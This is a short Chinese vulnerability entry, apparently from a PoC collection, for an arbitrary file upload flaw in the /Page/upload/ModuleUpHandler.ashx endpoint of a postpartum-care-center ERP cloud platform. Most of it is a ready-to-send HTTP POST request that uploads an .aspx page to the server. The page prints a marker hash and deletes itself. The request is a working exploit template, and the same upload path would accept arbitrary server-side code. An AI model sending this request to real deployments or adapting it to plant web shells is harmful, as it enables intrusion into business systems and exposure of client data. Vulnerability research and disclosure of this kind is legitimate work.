漏洞描述
月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞。
月子护理ERP管理平台 /Page/upload/ModuleUpHandler.ashx 任意文件上传漏洞
PoC代码
POST /Page/upload/ModuleUpHandler.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 369
Content-Type: multipart/form-data; boundary=00content0boundary00
Cookie:
Accept-Encoding: gzip
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="uwimfllx.aspx"
<%@ Page Language="C#" %><script runat="server">protected void Page_Load(object sender, EventArgs e){Response.Write("136928f8338842b6e34cd5805ffbc7b5");Response.Flush();System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); }</script>
--00content0boundary00--